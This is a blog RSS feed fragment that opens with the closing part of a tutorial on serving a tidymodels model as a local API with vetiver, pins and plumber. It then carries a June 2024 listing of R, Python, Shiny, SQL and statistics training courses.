&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;vetiver&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;vetiver_pin_write&lt;/span&gt;(board &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pins&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;board_connect&lt;/span&gt;(), v_model)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To retrieve the object, use:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Not something you would normally do with a {vetiver} model&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pins&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;pin_read&lt;/span&gt;(pins&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;board_connect&lt;/span&gt;(), &lt;span style="color:#a5d6ff"&gt;&amp;#34;colin/k-nn&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; $model&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; bundled workflow object.&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; $prototype&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; # A tibble: 0 × 3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; # ℹ 3 variables: island &amp;lt;fct&amp;gt;, flipper_length_mm &amp;lt;int&amp;gt;, body_mass_g &amp;lt;int&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="deploying-as-an-api"&gt;Deploying as an API&lt;/h3&gt;
&lt;p&gt;The final step is to construct an API around your stored model. This is
achieved using the {plumber} package. To deploy locally, i.e. on your
own computer, we create a plumber instance and pass the model using
{vetiver}:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plumber&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;pr&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; vetiver&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;vetiver_api&lt;/span&gt;(v_model) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; plumber&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;pr_run&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This deploys the API locally. When you run the code, a browser window
will likely open. If it doesn’t, simply navigate to
&lt;code&gt;http://127.0.0.1:7764/__docs__/&lt;/code&gt; (your port number may differ).&lt;/p&gt;
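&lt;p&gt;In practice, the API would usually serve the model read back from its pin rather than the object in your R session, and fixing the port keeps the address predictable. The following is a minimal sketch under stated assumptions, not the setup used in this post: a temporary local board (&lt;code&gt;pins::board_temp()&lt;/code&gt;) stands in for Posit Connect, a small &lt;code&gt;lm()&lt;/code&gt; fit on &lt;code&gt;mtcars&lt;/code&gt; stands in for the k-nn workflow, and the names &lt;code&gt;cars-lm&lt;/code&gt;, &lt;code&gt;v_demo&lt;/code&gt;, &lt;code&gt;v_stored&lt;/code&gt; and &lt;code&gt;api&lt;/code&gt; are purely illustrative.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Assumption: a throwaway local board replaces pins::board_connect()
board = pins::board_temp(versioned = TRUE)

# Hypothetical stand-in model; the post's v_model would be handled the same way
fit = lm(mpg ~ wt + hp, data = mtcars)
v_demo = vetiver::vetiver_model(fit, &amp;#34;cars-lm&amp;#34;)

# Store the model as a pin, then read it back as a {vetiver} model
vetiver::vetiver_pin_write(board, v_demo)
v_stored = vetiver::vetiver_pin_read(board, &amp;#34;cars-lm&amp;#34;)

# Build the API around the stored model
api = plumber::pr() |&amp;gt;
  vetiver::vetiver_api(v_stored)

# Serve on a fixed port; pr_run() blocks until interrupted,
# so only start it from an interactive session
if (interactive()) {
  plumber::pr_run(api, port = 7764)
}
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;With the port fixed, the documentation page should always be at &lt;code&gt;http://127.0.0.1:7764/__docs__/&lt;/code&gt;. Swapping &lt;code&gt;board_temp()&lt;/code&gt; for &lt;code&gt;board_connect()&lt;/code&gt; would, in principle, read the model from Posit Connect instead.&lt;/p&gt;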
&lt;p&gt;If the API has successfully deployed, then&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;base_url &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;http://127.0.0.1:7764/&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;url &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;paste0&lt;/span&gt;(base_url, &lt;span style="color:#a5d6ff"&gt;&amp;#34;ping&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;r &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; httr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;GET&lt;/span&gt;(url)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;metadata &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; httr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;content&lt;/span&gt;(r, as &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;text&amp;#34;&lt;/span&gt;, encoding &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;UTF-8&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;jsonlite&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;fromJSON&lt;/span&gt;(metadata)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;should return&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#$status&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#[1] &amp;#34;online&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#$time&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#[1] &amp;#34;2024-05-27 17:15:39&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The API also has endpoints &lt;code&gt;metadata&lt;/code&gt; and &lt;code&gt;pin-url&lt;/code&gt;, allowing you to
programmatically query the model. The key endpoint for MLOps is
&lt;code&gt;predict&lt;/code&gt;. This endpoint allows you to pass new data to your model and
predict the outcome:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;url &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;paste0&lt;/span&gt;(base_url, &lt;span style="color:#a5d6ff"&gt;&amp;#34;predict&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;endpoint &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; vetiver&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;vetiver_endpoint&lt;/span&gt;(url)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pred_data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; penguins_data &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dplyr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;select&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;island&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;flipper_length_mm&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;body_mass_g&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dplyr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;slice_sample&lt;/span&gt;(n &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;predict&lt;/span&gt;(endpoint, pred_data)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="summary"&gt;Summary&lt;/h2&gt;
&lt;p&gt;This post introduces MLOps and its applications. In the next post, we’ll
discuss deploying models in production.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/vetiver-mlops-tidymodels-deployment/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>June 2024 Training Update</title><link>https://www.jumpingrivers.com/blog/june-2024-training-update-r-python-statistical-modelling-shiny-visualisation-wrangling/</link><pubDate>Thu, 06 Jun 2024 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/june-2024-training-update-r-python-statistical-modelling-shiny-visualisation-wrangling/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/june-2024-training-update-r-python-statistical-modelling-shiny-visualisation-wrangling/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/june-2024-training-update-r-python-statistical-modelling-shiny-visualisation-wrangling/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Our courses for the second half of 2024 have now been released. We have everything from the very basics of R and Python for data science, to advanced statistical modelling and machine learning. Interested in dashboards and reporting? We have courses on reporting with Quarto, as well as both introductory and advanced Shiny. Already know the basics but want to hone your skills? We have plenty of intermediate courses for you, as well as a course to take a look at some best practices in R and Python.&lt;/p&gt;
&lt;p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Whether you want to start from scratch, or improve your skills, &lt;a href="https://www.jumpingrivers.com/training/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2024-june-training-update"&gt;Jumping Rivers has a training course for you&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;/p&gt;
&lt;h3 id="r"&gt;R&lt;/h3&gt;
&lt;h4 id="introduction-to-r"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-introduction-tidyverse-readr-ggplot2-dplyr/" rel="external"&gt;Introduction to R&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Foundation&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 3rd July, 7th October&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;R is a versatile language for statistical computing and graphics. In this course you will learn the advantages of using R and how to get started. You will gain familiarity with the RStudio interface and learn the R basics. Also included is an introduction to the Tidyverse and how to use various packages for data storage, visualisation and manipulation. This course provides a great foundation to begin your R journey!&lt;/p&gt;
&lt;h4 id="programming-with-r"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-programming-functions-looping-conditionals/" rel="external"&gt;Programming with R&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 15th July, 21st October&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;The benefit of using a programming language such as R is that we can automate repetitive tasks. This course covers the fundamental techniques such as functions, for loops and conditional expressions. By the end of this course, you will understand what these techniques are and when to use them. This is a one-day intensive course on R.&lt;/p&gt;
&lt;h4 id="data-wrangling-in-the-tidyverse"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/data-tidyverse-dplyr-tidyr-lubridate-forcats/" rel="external"&gt;Data Wrangling in the Tidyverse&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Foundation&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 10th July, 16th October&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;If you work with data, you probably spend a lot of time cleaning it and wrangling it into the correct shape. This course will show you how you can use R to efficiently clean and wrangle your data into a format that’s ready for analysis. You will learn about the Tidyverse, what tidy data really is, and how to practically achieve it with packages such as {dplyr}, {tidyr}, {lubridate} and {forcats}.&lt;/p&gt;
&lt;h4 id="data-visualisation-with-ggplot2"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-advanced-graphics-ggplot2-plotly-themes-scaling-faceting/" rel="external"&gt;Data Visualisation with ggplot2&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 22nd July, 4th November&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Want to learn how to effectively visualise your data in R using the elegant {ggplot2} package? With {ggplot2} it’s easy to customise everything from plot layouts and themes to scales, colours, and more! This course will comprehensively take you through basic plot types such as bar and line charts as well as cover more advanced topics such as interactive graphics with {plotly}.&lt;/p&gt;
&lt;h4 id="r-best-practices"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-best-practices/" rel="external"&gt;R Best Practices&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 22nd July&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;So you can write code? Great. But can you write code that is easy to read, simple to maintain, and reproducible? Under the pressure of deadlines, even the best of us can fall victim to bad practices. In this course we motivate the importance of good practices, and show how to make best practices second nature by incorporating them into our normal workflow.&lt;/p&gt;
&lt;h4 id="object-oriented-programming-in-r"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/oop-s3-s4-r6-classes/" rel="external"&gt;Object Oriented Programming in R&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Advanced&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 15th July&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;The training course will cover R object-oriented programming techniques. We’ll discuss what OOP is and the different varieties within R. Beginning with the popular S3 and S4 OOP frameworks, we’ll finish with the new {R6} package that is used extensively in Shiny applications. By the end of the course, participants will be able to use OOP within their own code.&lt;/p&gt;
&lt;hr&gt;
&lt;h3 id="shiny"&gt;Shiny&lt;/h3&gt;
&lt;h4 id="introduction-to-shiny"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-introduction-shiny-application-web/" rel="external"&gt;Introduction to Shiny&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 10th July, 7th October&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Do you want to provide interactive visualisation and data exploration features for users who do not have R and data science skills? Discover how easy it can be to use R and {shiny} to create your own apps and dashboards for exploring data without relying on web development or external BI tools. We will show you various examples of input widgets and outputs to display tables and visualisations.&lt;/p&gt;
&lt;h4 id="advanced-concepts-in-shiny"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/advanced-shiny/" rel="external"&gt;Advanced Concepts in Shiny&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Advanced&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 23rd September, 14th October&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Take your interactive {shiny} skills to the next level by creating more robust, responsive and maintainable applications. In this course, we’ll visit more advanced topics that can be used to improve the experience for both those producing the apps and those using them. Subjects will cover: additional ways to react to and validate user inputs; restructuring your app with modules; and an introduction to testing your {shiny} apps.&lt;/p&gt;
&lt;hr&gt;
&lt;h3 id="python"&gt;Python&lt;/h3&gt;
&lt;h4 id="introduction-to-python"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/python-introduction-visualisation-manipulation/" rel="external"&gt;Introduction to Python&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Foundation&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 9th September, 14th October&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Python is a general-purpose programming language popular among data scientists and statisticians. In this one-day introductory course, participants will learn to import, summarise and visualise their data. At each step, we avoid using “magic code”, and stress the importance of understanding what Python is doing.&lt;/p&gt;
&lt;h4 id="programming-with-python"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/python-programming-control-flow-functions/" rel="external"&gt;Programming with Python&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 16th September, 23rd October&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;The benefit of using a programming language such as Python is that we can automate repetitive tasks. This course covers the fundamental techniques such as functions, for loops and conditional expressions. By the end of this course, you will understand what these techniques are and how they can be applied to solve real-world data wrangling tasks.&lt;/p&gt;
&lt;h4 id="data-visualisation-with-python"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/python-matplotlib-seaborn-visualisation/" rel="external"&gt;Data Visualisation with Python&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 17th June, 23rd September, 11th November&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Python has a number of packages for the effective creation of graphics to communicate your data insights. This course will examine two popular libraries for creating static 2D plots: Matplotlib and Seaborn. During the training session, we’ll cover plotting basics and customisation of figures with Matplotlib, before moving on to complex statistical visualisations with Seaborn.&lt;/p&gt;
&lt;h4 id="python-best-practices"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/python-best-practices/" rel="external"&gt;Python Best Practices&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 22nd July&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;So you can write code? Great. But can you write code that is easy to read, simple to maintain, and reproducible? Under the pressure of deadlines, even the best of us can fall victim to bad practices. In this course we motivate the importance of good practices, and show how to make best practices second nature by incorporating them into our normal workflow.&lt;/p&gt;
&lt;hr&gt;
&lt;h3 id="reporting"&gt;Reporting&lt;/h3&gt;
&lt;h4 id="reporting-with-quarto"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/reporting-with-quarto/" rel="external"&gt;Reporting with Quarto&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 24th June, 23rd September, 18th November&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Do you create interactive documents that always need to be updated when the data changes? Then this course is for you. In this course you will learn how to use Quarto to create high quality, dynamic, fully reproducible documents. Quarto is a multi-language open source publishing tool that allows for the creation of dynamic content with Python, R, Julia and Observable.&lt;/p&gt;
&lt;hr&gt;
&lt;h3 id="machine-learning"&gt;Machine Learning&lt;/h3&gt;
&lt;h4 id="machine-learning-with-tidymodels"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-prediction-inference-analytics-machine-learning-tidymodels/" rel="external"&gt;Machine Learning with Tidymodels&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 16th September, 11th November&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Machine learning is the process of applying statistical techniques to gain systematic information about a quantity of interest. We will be specifically focusing on how we can use the {tidymodels} suite of packages to implement these techniques. We cover key reasons for model fitting, such as prediction and inference, on quantitative and qualitative responses.&lt;/p&gt;
&lt;h4 id="advanced-machine-learning-with-tidymodels"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-prediction-inference-tidymodels-lda-pre-processing-tree-based-models/" rel="external"&gt;Advanced Machine Learning with Tidymodels&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Advanced&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 23rd September, 18th November&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;This course builds on the material covered in our Machine Learning with Tidymodels course. We look at how to fit linear discriminant analysis (LDA) models using {discrim}, how to assess model reliability using V-fold cross-validation, and cover pre-processing, tree-based models and more. If you wish to explore the abundance of model fitting techniques {tidymodels} has to offer, then this course is certainly for you!&lt;/p&gt;
&lt;hr&gt;
&lt;h3 id="sql"&gt;SQL&lt;/h3&gt;
&lt;h4 id="an-introduction-to-sql-with-r"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-sql-databases-aggregation/" rel="external"&gt;An Introduction to SQL with R&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 2nd October&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Using databases is a fundamental part of a data scientist’s role. This training course introduces SQL databases, guides you through writing your first SQL queries, and shows how R can be used to retrieve and manipulate data stored in a relational database. The course uses both the {DBI} and {dbplyr} packages.&lt;/p&gt;
&lt;p&gt;We use the PostgreSQL database as an example for public courses. For in-house training, we are happy to adapt the course to match your database requirements.&lt;/p&gt;
&lt;h4 id="introduction-to-sql-with-python"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/python-sql-databases-pandas-sqlalchemy/" rel="external"&gt;Introduction to SQL with Python&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 2nd October&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Using databases is a fundamental part of a data scientist’s role. This training course introduces SQL databases and the SQL command syntax, and shows how Python can be used to retrieve and manipulate data held in a relational database. The course also discusses how SQLAlchemy can be used to define and interact with databases using object-oriented Python code.&lt;/p&gt;
&lt;p&gt;We use a PostgreSQL database as an example, and communicate with this using a psycopg2 connection.&lt;/p&gt;
&lt;hr&gt;
&lt;h3 id="statistics"&gt;Statistics&lt;/h3&gt;
&lt;h4 id="statistical-modelling-with-r"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-statistics-modelling-linear-regression-clustering/" rel="external"&gt;Statistical Modelling with R&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 9th September, 23rd October&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;From the very beginning, R was designed for statistical modelling. Out of the box, R makes standard statistical techniques easy. This course covers the fundamental modelling techniques. We begin the day by revising hypothesis tests, before moving on to ANOVA tables and regression analysis. The class ends by looking at more sophisticated methods such as clustering and principal components analysis (PCA).&lt;/p&gt;
&lt;h4 id="introduction-to-bayesian-inference-using-rstan"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/introduction-bayesian-inference-rstan-monte-carlo/" rel="external"&gt;Introduction to Bayesian Inference using RStan&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 1st July, 14th October&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Despite the promise of big data, inferences are often limited by its systematic structure. Only by carefully modelling this structure can we take full advantage of the data. Stan is a platform for facilitating this modelling, providing an expressive modelling language to implement state-of-the-art algorithms, to draw subsequent Bayesian inferences. This course will teach participants how to interface with Stan through R!&lt;/p&gt;
&lt;h4 id="introduction-to-bayesian-inference-using-pystan"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/introduction-bayesian-inference-pystan-monte-carlo/" rel="external"&gt;Introduction to Bayesian Inference using PyStan&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 15th July, 21st October&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Despite the promise of big data, inferences are often limited by its systematic structure. Only by carefully modelling this structure can we take full advantage of the data. Stan is a platform for facilitating this modelling, providing an expressive modelling language to implement state-of-the-art algorithms, to draw subsequent Bayesian inferences.&lt;/p&gt;
&lt;p&gt;The course will teach participants how to interface with Stan through Python!&lt;/p&gt;
&lt;p&gt;
